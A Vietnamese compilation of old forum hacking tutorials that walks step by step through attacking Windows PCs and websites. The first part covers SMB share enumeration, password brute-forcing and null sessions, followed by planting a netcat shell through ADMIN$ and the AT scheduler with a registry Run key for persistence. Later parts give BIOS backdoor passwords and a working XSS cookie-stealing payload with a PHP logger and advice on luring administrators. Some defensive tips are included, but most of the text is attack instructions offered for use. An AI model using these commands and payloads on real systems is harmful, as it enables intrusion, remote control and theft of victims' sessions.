basic cổ điển

Màu nền
Font chữ
Font size
Chiều cao dòng

Các kiến thức hacking cơ bản và cổ điển !!! (bài 1)

________________________________________

Có nhiều bạn vào thế giới hacking nhưng vẫn chưa hiểu hack là gì và đôi khi vẫn còn chưa hiểu các cách hack nâng cao của các thế hệ đi trước nay mình sưu tập một số cách hack cơ bản cho các bạn , cũng mong các bạn củng cố được kiến thức của mình

Có nhiều tác giả khác nhau cũng mong các tác giả lượng thứ và chia sẽ kiến thức đến cho mọi người

Bắt đầu :

hack pc không có gì là không thể

Bài viết này với mục đích chia sẻ,học hỏi,trao đổi kiến thức! Nội dung của bài viết là hack vào PC sử dụng HĐH windows và các phương pháp phòng chống (trong phạm vi kiến thức của tui thôi nha). Bây giờ chúng ta cùng bắt đầu suy nghĩ những hướng phải đi. Khi bạn Online ( tức kết nối vào Internet) bạn sẽ được ISP gán cho một IP nào đó. Vậy Hacker có biết được IP của bạn không? Câu trả lời là có ( nếu Hacker giao tiếp với bạn,có nghĩa là máy của bạn và máy của hacker có sự kết nối, đồng nghĩa với việc trao đổi các packet,từ các packet có thể biết được địa chi IP nguồn)

Khi biết IP của bạn liệu hacker có thể hack vào máy tính của bạn không? Câu trả lời là hoàn toàn có thể.

Vậy hacker làm như thế nào để Hack?

Hacking thông qua resource share:

Hacker có thể dùng các tool hack tự động ví dụ như : ent3,legion... ( nhưng bản chất của các công cụ này là thưc hiện các bước mà tôi sẽ nói dưới đây 1 cách tự động,chính vì vậy việc dùng các tool này là một cách khá củ chuối ...)

Trước tiên Hacker sẽ kiểm tra nhưng tài nguyên được chia sẻ trên máy tính của bạn.

Chỉ bằng vài dòng lệnh đơn giản trên comand line:

CODE

[C:\>Net view \\x.x.x.x ( với x.x.x.x là địa chỉ IP của bạn mà hacker đã biết )

Shared resources at \\x.x.x.x

Share name Type Used as Comment

-------------------------------------------------------------------------------

C Disk

PRJA3 Disk

The command completed successfully.

C:\>

Với Windows 95 & 98 thì khả năng bị hack Cao hơn nhiều so với Windows NT,2000,XP ( vì win 95,98 dùng định dạng FAT&FAT32 có độ bảo mật thấp hơn nhiều so với NTFS)

Đối với hai loại Windows này (95,98) Hacker thậm chí không cần lấy Administrator cũng có thể làm được tất cả ( bạn có tin không ?).

Khuyến cáo : không nên dùng 2 loại win này vì quá lỗi thời và có thể bị hack bất cứ lúc nào.

Sau khi liệt kê các Ổ đĩa,folder share bước tiếp theo của hacker là phải truy cập vào các ổ đĩa,folder đó để lấy dữ liệu (đây cũng là mục đích của hacker).Hacker sẽ ánh sạ ổ đĩa ,thư mục share để truy cập vào.

Cũng bằng command line:

CODE

C:\> net use z: \\x.x.x.x \share

The command completed successfully.

Chẳng lẽ hack đơn gian vậy sao ? Không , không hề đơn giản như thế bởi vì máy của victim có đặt password ( viêc ánh sạ cần phải biết username & password ).Thế là Hacker pó tay ? không hacker không bao giờ chịu pó tay,hacker sẽ cố gắng lấy username & password

Lấy Username :

CODE

C:\> Nbtstat -A x.x.x.x

NetBIOS Remote Machine Name Table

Name Type Status

---------------------------------------------

ADMIN <00> UNIQUE Registered

BODY <00> GROUP Registered

ADMIN f <20> UNIQUE Registered

BODY <1E> GROUP Registered

BODY <1D> UNIQUE Registered

..__MSBROWSE__.<01> GROUP Registered

MAC Address = 00-08-A1-5B-E3-8C

Vậy máy x.x.x.x sẽ có 2 username là : ADMIN va BODY

Khi đã có username hacker sẽ tiến hành Crack password ( dựa vào các tool như : pqwak,xIntruder) Hoặc Hacker sẽ tiến hành tạo ra một từ điển ( dựa vào khả năng phán đoán của hacker ) tên là : pass.txt

CODE

"" ADMIN

123456 ADMIN

123456 BODY

"" BODY

...

Sau đó hacker crack bang lệnh :

[/code]Cũng có thể tạo Userlist.txt và passlist.txt rồi dùng lệnh:

CODE

C:\> FOR /F %i IN (1,1,254) DO nat -u userlist.txt -p passlist.txt x.x.x.x.%I>>output.txt

Đối với Win 2000,XP hacker sẽ không là gì nếu không phải administrator chính vì vậy hacker bằng mọi giá sẽ lấy cho được administrator.

nếu lấy được admin thì việc còn lại thì chờ hacker định đoạt.

Khuyến cáo : không nên share gì hết ( trong trường hợp buộc phải share thì nên đặt password phức tạp 1 chút )

Giả sử rằng máy của Victim không share. Vậy hacker làm sao ?

Trong trường hợp này hacker sẽ đoán user & pass (có thể dùng cách ở trên hoặc dung các tool như: user2sid/sid2user,dumpACL,SMBGrind......) sau đó kết nối tới IPC$ ( mặc định share của windows)

CODE

C:\> net use \\x.x.x.x\IPC$ "password" /user:"administrator"

The command completed successfully.

Trong trường hợp không thê đoán Đươc user & pass hacker có thể thiết lập một Null session tới máy victim:

CODE

C:\> net use \\x.x.x.x\IPC$ "" /user:""

The command completed successfully

Và rồi nếu victim permission không đúng sẽ có nhưng hậu quả khôn lường.

khuyến cáo : Vô hiệu hoá NetBios ( Bấm vào My Network Places chọn Local Area Connetion, chọn TCP/ IP sau đó bấm vào propperties chọn Advandce, chọn WINS và bấm vào Disable NetBIOS over TCP / IP), Dùng firewall chặn 1 số port không cần thiết , khoá tài khoản sau 1 số lần đăng nhập thất bại .

Tiện đây cũng nói thêm về điều khiển từ xa ( vì có nhiều bạn đột nhập được vào rùi mà không biết phải làm sao )

Giả sử rằng bạn đã có username,password của admin của máy victim rồi:

giờ thiết lập 1 phiên làm viêc:

CODE

C:\> net use \\x.x.x.x\IPC$ "password" /user:"administrator"

The command completed successfully.

Sau đó ta cần copy backdoor để điều khiển máy victim có rất nhiều loại backdoor nhưng tôi thấy hơn cả vẫn là : netcat ( nc)

chép nc vào máy victim

CODE

C:\>copy nc.exe \\x.x.x.x\ADMIN$

c.exe

The command completed successfully.

1 file copies

Chạy service Schedule trên máy victim ( có service này mới thực thi đ ươc các file trên máy victim, mặc đinh khi cài win sẽ chạy service này)

CODE

C:\> sc \\x.x.x.x start schedule

service_name : schedule

Bây giờ kiểm tra giờ trên máy victim

CODE

C:\> net time \\x.x.x.x

Current time at \\10.0.0.31 is 6/29/2005 4:50 AM

The command completed successfully.

Bây giờ chạy netcat ở chế độ ẩn lắng nghe cổng 111:

CODE

C:\>AT \\x.x.x.x 4:55 /interactive "c:\windows

c.exe" -L -d -p111 -e cmd.exe

Added a new job with job ID = 1

đợi đến 4:55 rồi chạy thử nc.exe

CODE

C:\>nc -nvv x.x.x.x 111

(UNKNOWN) [x.x.x.x] 111 (?) open

Microsoft Windows XP [Version 5.1.2600]

© Copyright 1985-2001 Microsoft Corp.

C:\windows>

Bây giờ làm gì thì tuỳ nha ( nhưng đừng có phá hoại người ta nhe')

Vấn đề là làm sao cho những lần sau victim bật máy tính lên netcat tự động chạy và lắng nghe mệnh lệnh của ta?

Bạn có thể cho netcat khởi động cùng windows. "moi" file netcat.reg (dùng notepad và save lại thành .reg) có nội dung như sau:

CODE

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run]

"netcat"="\"C:\

c\

c.exe\" -L -d -p111 -e cmd.exe"

nhoccon1412(VNISS)

Các kiến thức hacking cơ bản và cổ điển (bài 2)

Tổng hợp Bypass / Crack BIOS Password

Trước khi bạn cố gắng bypass hay crack BIOS bạn nên liên hệ với nhà sản xuất phần cứng mà bạn đang sử dụng (MainBoard) để nhận được sự hỗ trợ từ họ và đừng quên hỏi họ làm thế nào để bypass BIOS security. Trong một số trường hợp họ không thể giúp bạn, nhưng ở đây là 1 số phương pháp có thể giúp bạn bypass hay reset password của BIOS:

• Backdoor Passwords

• Sử dụng phần mềm Cracking Password BIOS

• Reset password bằng cách dùng jumpers hay solder beads.

• Lấy Pin CMOS ra ngoài ít nhất 10 phút

• Một số cách khác

• Sử dụng những dịch vụ chuyên nghiệp

Backdoor Passwords

Nhiều nhà sản xuất phần cứng đã cung cấp những mật khẩu Backdoor để giúp bạn tuy cập đến BIOS setup trong trường hợp bạn quên mất mật khẩu của mình.

Chú ý: Một vài BIOS đã thiết lập để khoá hệ thống của bạn nếu bạn đánh password sai trên 3 lần. Vì thế bạn nên đọc tài liệu của nhà sản xuất trước khi bắt đầu đánh password.

Award BIOS backdoor passwords:

ALFAROME ALLy aLLy aLLY ALLY aPAf _award

BIOSTAR CONCAT CONDO Condo d8on djonet HLT

KDD Lkwpeter LKWPETER PINT pint SER SKY_FOX

ZAAADA ZBAAACAZJAAADC01322222 589589 589721 595595

AWARD_SW AWARD?SW AWARD SW AWARD PW AWKWARD awkward

J64 J256 J262 j332 j322

SYXZ syxz shift + syxz TTPTHA

598598

AMI BIOS backdoor passwords:

AMI AAAMMMIII BIOS PASSWORD HEWITT RAND AMI?SW AMI_SW LKWPETER A.M.I. CONDO

PHOENIX BIOS backdoor passwords:

phoenix, PHOENIX, CMOS, BIOS

MISC. COMMON PASSWORDS

ALFAROME BIOSTAR biostar biosstar CMOS cmos

LKWPETER lkwpeter setup SETUP Syxz Wodj

OTHER BIOS PASSWORDS BY MANUFACTURER

Manufacturer

Password

VOBIS & IBM

merlin

Dell

Dell

Biostar

Biostar

Compaq

Compaq

Enox

xo11nE

Epox

central

Freetech

Posterie

IWill

iwill

Jetway

spooml

Packard Bell

bell9

QDI

QDI

Siemens

SKY_FOX

TMC

BIGO

Toshiba

Toshiba

TOSHIBA BIOS

Một số sản phẩm laptop và desktop của Toshiba sẽ cho phép bạn bypass BIOS Password nếu bạn giữ phím Shift trong suốt qúa trình boot.

IBM APTIVA BIOS

Click cả chuột phải và trái liên tục trong suốt quá trình

Nếu tất cả đều không được bạn có thể sử dụng default passords list: :

http://www.phenoelit.de/dpl/dpl.html

Ngoài ra, nếu bạn muốn vô hiệu hóa mật khẩu đã cài trong BIOS (để không ai có thể thay đổi phần cấu hình trong BIOS), bạn có thể gõ lệnh debug sau khi vào được trong DOS: C:\>debug -O 70 2f -O 71 ff -Q

Sử dụng phần mềm Cracking Password BIOS

Dưới đây là 1 số phần mềm dùng để bypass BIOS, chúng có thể được xem là nguy hiểm hoặc là có ích tuỳ theo mức độ. Tuy nhiên tôi khuyên bạn hãy thận trọng khi dùng nó.

• http://www.cgsecurity.org/index.html?cmospwd.html

• http://www.dewassoc.com/support/bios/bios_password.htm

• http://www.majorgeeks.com/download2969.html

Reset password bằng cách dùng jumpers hay solder beads.

Tắt máy tính, gạt jumper tới vị trí tiếp xúc với mảnh kim loại (có thể bạn sẽ phải cầm tay giữ jumper khi đẩy chúng tiếp xúc với mảnh kim loại). Nhấn nguồn để bật máy tính, khi đó hệ thống của bạn sẽ không thể khởi động được theo cách này nhưng CMOS lại bị xoá hết. Tiếp sau đó, bạn đặt đặt jumper về vị trí mặc định và khởi động lại máy tính bình thường. Trong hầu hết trường hợp, máy tính của bạn sẽ dừng ngay tại màn hình POST và yêu cầu bạn nhấn F1 hoặc một từ khoá nào đó để định lại BIOS về dạng mặc định. Để thực hiện được điều này, từ màn hình BIOS, bạn chỉ cần lưu (save) và thoát (exit) để vào máy tính một cách bình thường, khi đó mật khẩu BIOS đã bị xoá bỏ hoàn toàn.

Sau khi đã xóa được RAM CMOS, bạn khởi động máy lại, vào trình Setup để cấu hình lại các thông số đúng cho BIOS. Nếu bạn quên các thông số này, bạn có thể dùng chức năng "Load BIOS default".

Lấy Pin CMOS ra ngoài ít nhất 10 phút

Bằng cách gỡ pin nuôi CMOS ra khỏi mainboard rồi gắn lại. Tuy nhiên tùy theo loại pin mà có thể sẽ phải dùng mỏ hàn và đòi hỏi phải biết về kỷ thuật hàn mạch điện tử.

Một số cách khác

* Bằng cách gỡ chip RAM CMOS ra khỏi mainboard 1 thời gian (để các tụ lọc phóng hết điện) rồi gắn lại nếu chip này được gắn trên một đế.

* Bằng cách chập mạch các transistor và RAM CMOS trên mainboard (cách nầy không nên làm nếu không biết về điện tử).

Sử dụng những dịch vụ chuyên nghiệp

Bằng cách gọi 911 hehe, í mà ở Việt Nam cũng có 911 mà, các bạn có thể vào đây để yêu cầu giúp đỡ nhanh chóng nhớ nhé, đừng có gọi lộn 113 thì toi . Good Luck

nhoccon1412(VNISS)

Các kiến thức hacking cơ bản và cổ điển (bài 3)

XSS căn bản

Copyright by HCVTeam.net --- huythanhv2

Ngày nay, trên Internet ko khó để thấy các bug mới về XSS. huythanh thấy ngứa tay ngứa chân khi ko làm được gì nên đã tìm hiểu kĩ về cái này. Vì mới tìm hiểu nên bài này hợp với newbie hơn . Ai copy nhớ cái copyright hộ nhá

** huythanh viết bài này sau khi đã tham khảo wa bài của Mask_NBTA . Hix nhớ bài này lúc trước vương vãi khắp nơi bi giờ tìm mún đỏ con mắt cũng ko có, may là in ra 1 bản rồi . Bài của huythanh sẽ tóm tắt và sửa 1 số lỗi nhỏ trong bài của mask, hix có mấy chỗ mò cả ngày mới ra . Anyway, cho gởi lời cảm ơn đặc biệt đến Mask

Đầu tiên ta cần phân biệt là XSS <> CSS, cái nì có nhiều người lộn lắm

CSS : Cascading Style Sheets

XSS : Cross-Site Scripting

*** Dấu hiệu nhận biết site mắc lỗi :

Cách thông dụng nhất là chèn script vào các biến truyền trực tiếp trên address, các exploit thường dựa trên cái này

Vd : http://sitebixss.com/index.php?act=[chèn xss vào đây]

Cái [chèn xss vào đây] thì chẳng thấy ai nói tới cả , chắc ai cũng nghĩ người khác là siêu sao

*** Cách chèn script :

Ta dùng javascript để chèn vào, trước hết xem qua các hàm sau cho biết sơ sơ đã

Bây giờ bạn vào 1 forum đi, vd ibf đi nhá ( thực hành ngay trên HCV cũng được )

Okie, log in vào và thay address bằng đoạn code sau đây, y chang nhá

CODE

javascript:alert(document.cookie)

Thấy gì nào ? Nó sẽ ra có dạng thế này

CODE

acpcollapseprefs=900,1000,1350; forum_read=a:1:{i:2;i:1122471452;}; session_id=64e939f642a0315bc3fb655f7ef36bf6; member_id=1; pass_hash=c561a5a3859a0df75f76d98ae67bc026

[ Đoạn trên đây thử trên localhost nên các bác đừng thử fake cookie nhe ]

Rồi, nói nôm na là thế này, khi address của trình duyệt chính xác là 1 trang nào đó vd hcvteam.net thì lúc đó cookie của hcvteam.net sẽ được lưu tại trình duyệt với tên 1 biến là document.cookie

Bây giờ chỉ cần tạo 1 file php để truyền biến này cho nó làm việc, thế là xong

CODE

javascript:location="http://hostcuaban/cookie.php?cookie="+(document.cookie)

Hàm location để chuyển trình duyệt đến 1 trang khác, lưu ý lúc đó document.cookie sẽ thay bằng giá trị cookie, đó là chỗ tui thấy hay nhất.

Nếu hiểu được tới đây thì chắc chẳng còn gì để nói . Sau đây là cách exploit.

*** Cách exploit :

Đầu tiên tạo file cookie.php thế này up lên host của bạn

CODE

<?

/*XSS Exploit */

/*PHP Cookie Saver */

/*Copyright by huythanhv2, HCVTEAM.NET */

$f=fopen("xss.txt","a");

$cook=$HTTP_GET_VARS["cookie"];

fputs($f,$cook.chr(13));

fclose($f);

header("location: http://DIACHIDEDUDO.DUDO");

?>

XSS giúp ta steal được cookie của victim, vì thế vd site bị xss thế này

CODE

http://sitexss.com/index.php?act=[xss]

Chúng ta khai thác thế này

CODE

http://sitexss.com/index.php?act=<script>location="http://hostcuaban.com/cookie.php?cookie="+(document.cookie)

</script>

Cookie victim sẽ lưu lại ở file xss.txt trên host của bạn

Bây giờ chỉ còn việc dụ "Alert" admin vào link trên là nó chết , nhớ đổi cái DIACHIDEDUDO.DUDO lai thành site bạn muốn nó vào sau khi cookie đã lưu lại ( nhằm giảm sự nghi ngờ thôi )

*** Vài lưu ý :

Đến đây là bạn có thể tự tin chơi XSS được rồi, đây là 3 điều nhỏ :

1/ Chỉ exploit được site nào có xài cookie, chứ "Alert" ACP của IBF dù nó có XSS 10000000 chỗ đi nữa thì cũng dek làm gì được ( nó xài session mà )

2/ Nên develope cái file php 1 vài cái, như mail về chẳng hạn, để dễ quản lý hơn

3/ Về javascript, bài của Mask_NBTA dùng window.open, nhưng mà bi giờ xài cái đó chẳng khác gì tự sát vì "Alert" nào cũng chống popup cả nên huythanh upgrade nó lên location

THE END ---- COPYRIGHT BY HCVTEAM.NET ---- YIM : huythanhv2

nhoccon1412(VNISS)

Các kiến thức hacking cơ bản và cổ điển (bài 3)

Các lệnh sử dụng hoặc xâm nhập OS Linux

_ Lệnh " man" : Khi bạn muốn biết cách sử dụng lệnh nào thì có thể dùng tới

lệnh nay :

Cấu trúc lệnh : $ man .

Ví dụ : $ man man

_ Lệnh " uname ": cho ta biết các thông tin cơ bản về hệ thống

Ví dụ : $uname -a ; nó sẽ đưa ra thông tin sau :

Linux gamma 2.4.18 #3 Wed Dec 26 10:50:09 ICT 2001 i686 unknown

_ Lệnh id : xem uid/gid hiện tại ( xem nhóm và tên hiện tại )

_ Lệnh w : xem các user đang login và action của họ trên hệ thống .

Ví Dụ : $w nó sẽ đưa ra thông tin sau :

10:31pm up 25 days, 4:07, 18 users, load average: 0.06, 0.01, 0.00

_ Lệnh ps: xem thông tin các process trên hệ thống

Ví dụ : $ps axuw

_ Lệnh cd : bạn muốn di chuyển đến thư mục nào . phải nhờ đến lệnh này .

Ví du : $ cd /usr/bin ----> nó sẽ đưa bạn đến thư mục bin

_ Lệnh mkdir : tạo 1 thư mục .

Ví dụ : $ mkdir /home/convit ---> nó sẽ tạo 1 thư mục convit trong /home

_ Lệnh rmdir : gỡ bỏ thư mục

Ví dụ : $ rmdir /home/conga ----> nó sẽ gỡ bỏ thư mục conga trong /home .

_ Lệnh ls: liệt kê nội dung thư mục

Ví dụ : $ls -laR /

_ Lệnh printf: in dữ liệu có định dạng, giống như sử dựng printf() của C++ .

Ví dụ : $printf %s "\x41\x41\x41\x41"

_ Lệnh pwd: đưa ra thư mục hiện hành

Ví dụ : $pwd ------> nó sẽ cho ta biết vị trí hiện thời của ta ở đâu :

/home/level1

_ Các lệnh : cp, mv, rm có nghĩa là : copy, move, delete file

Ví dụ với lệnh rm (del) : $rm -rf /var/tmp/blah ----->nó sẽ del file blah .

Làm tương tự đối với các lệnh cp , mv .

_ Lệnh find : tìm kiếm file, thư mục

Ví dụ : $find / -user level2

_ Lệnh grep: công cụ tìm kiếm, cách sử dụng đơn giản nhất : grep "something"

Vidu : $ps axuw | grep "level1"

_ Lệnh Strings: in ra tất cả các ký tự in được trong 1 file. Dùng nó để tìm

các khai báo hành chuỗi trong chương trình, hay các gọi hàm hệ thống, có khi tìm

thấy cả password nữa

VD: $strings /usr/bin/level1

_ Lệnh strace: (linux) trace các gọi hàm hệ thống và signal, cực kỳ hữu ích để

theo dõi flow của chương trình, cách nhanh nhất để xác định chương trình bị

lỗi ở đoạn nào. Trên các hệ thống unix khác, tool tương đương là truss, ktrace

.

Ví dụ : $strace /usr/bin/level1

_ Lệnh" cat, more ": in nội dung file ra màn hình

$cat /etc/passwd | more --> nó sẽ đưa ra nội dung file passwd một cách nhanh nhất .

$more /etc/passwd ----> Nó sẽ đưa ra nội dung file passwd một cách từ từ .

_ Lệnh hexdump : in ra các giá trị tương ứng theo ascii, hex, octal, decimal của dữ

liệu nhập vào .

Ví dụ : $echo AAAA | hexdump

_ Lệnh : cc, gcc, make, gdb: các công cụ biên dịch và debug .

Ví dụ : $gcc -o -g bof bof.c

Ví dụ : $make bof

Ví dụ : $gdb level1

(gdb) break main

(gdb) run

_ Lệnh perl: một ngôn ngữ

Ví dụ : $perl -e 'print "A"x1024' | ./bufferoverflow ( Lỗi tràn bộ đệm khi ta đánh

vào 1024 kí tự )

_ Lệnh "bash" : đã đến lúc tự động hoá các tác vụ của bạn bằng shell

script, cực mạnh và linh hoạt .

Bạn muốn tìm hiểu về bash , xem nó như thế nào :

$man bash

_ Lệnh ls : Xem nội dung thư mục ( Liệt

Bạn đang đọc truyện trên: Truyen2U.Net

Ẩn QC